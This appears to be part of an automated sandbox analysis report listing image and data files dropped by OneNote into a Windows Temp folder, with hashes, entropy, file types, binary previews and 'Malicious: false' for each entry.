MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{DA4A696F-4046-438A-AAA2-5DBB811CD485}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{DED5CA50-7359-4D1B-9D0B-F53BDEC8E9CA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.704354350192026
Encrypted:	false
SSDEEP:	6:lLgtYyfh3h18xWXUnfu3zTl0InFFBl/FKspaF7EelBRuj8lvClax/mwEeljRujd:lEtYyfdu2UfuDlFFBtvsjlV/x/mY8
MD5:	F3C04F7D484BE966D96089F03EA31D06
SHA1:	A2CBC373F32BBED0AADFDE765CFB4017E451DE1C
SHA-256:	ED7C5931AB45B1A9AFC4905C0BFF48B30CD0E37A128A27128C39DC11BE55011F
SHA-512:	AA75ABA18E5E6C4C2D48FA318B08231822BAC4066D7A6BB7647EDADF4FD000609717A640B3E97F725D44EDA036A937A69C4B9F206B7A2BA8BA0C91792C71D394
Malicious:	false
Preview:	.R\{..M..Sx.)...5.$F.G.kC.?...................?.....I...................................................................../%&!A.8.T..L0.......................h..............................................._..D.3^.Ur`O..........._u..N..m................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{DEDB0522-28A1-447F-924D-11513955E414}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{E258B7CB-859B-4C4D-82FD-A5DEA9E048FA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{E7560F7E-E551-43DB-8FE7-A1F01374F259}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{E78A502F-F892-4D3D-8315-EEFF43AADE71}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{E93F7FAB-E6C6-48CE-9B6E-DA2DA9D74937}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6486945335703816
Encrypted:	false
SSDEEP:	6:RaanQ3pYyfB3h1RRXUnfDR/1GYFFBl/FKf71FbxlBRujlw//0lweI/mWxljRujd:RappYyf9/UfDRgYFFBtRWf/m1
MD5:	C6AA0252F18882E260B0326AE5FDA1B3
SHA1:	88E9893455835FF77A21AD5749E41377AB6A3D9C
SHA-256:	FF39D59C17BE0A4C91E53C75C9046DB588F6E77384B48DE93EFB1BD818F37EED
SHA-512:	A166A493F630D4F86B1C81094A593B9560CC8A9C62684BD58F65634D919FD5A7188442051B43769FA354E02C199B6249A14E5F33D784FA321A265F54C9D98CE8
Malicious:	false
Preview:	./.C..vL....W"v_x..%~G.O.RX?.BM.................?.....I...............................................................................................................h...........................................di..Jj~B....*.z...........l..vA......l.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{EAC53E19-C64A-4614-BB2C-9A3763E5EA15}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6468055098523144
Encrypted:	false
SSDEEP:	12:RaEbYyf9/UfHgOgONX9FFBtRB7h2EWf/W+2s:YEbYyfSPHgOFtRBVnv+r
MD5:	53DEBA31E19C2705AB347EE7AA91138E
SHA1:	80D2E432E50E2DFF133BADBCFB1979855EA46C37
SHA-256:	F49984D78C1CC92C484CBCE484AF02BAE66A41D13E3B2164B87BA166DA541FC5
SHA-512:	92E2393E901C18C4A8D9907589443B8E3BF3ECB5C8C98B08BBA9613F9DAB4B1B74BAC36F68C7211AADF15E6FDF13ADE940890B5B8700AD376E272697359CEB9E
Malicious:	false
Preview:	./.C..vL....W"v_.{...TiC..1....................?.....I...............................................................................................................h...........................................!.%k.oMN..................^R.r.@.p....og............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{ECAC551C-EFDB-427A-9107-146B5F903327}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Temp\{EFBB9DFB-AB65-4A11-B7EF-0AAB7DE81EB7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Temp\{F13FF5DA-D642-44E2-B782-7F7E3C8EFEAF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Temp\{F9990459-0C9A-48FC-90FF-2866B2AE8785}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Temp\{F9AC5C30-BD28-43E1-8EBF-51EBB1C86FFA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Temp\{FAA22ECF-A433-44BF-BD71-C5B61F4ACDB4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Temp\{FB2889BE-1C4A-47B6-BE16-390DFBAF7F03}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{FDE6E5D6-0930-48B8-A342-49DEF203A57B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
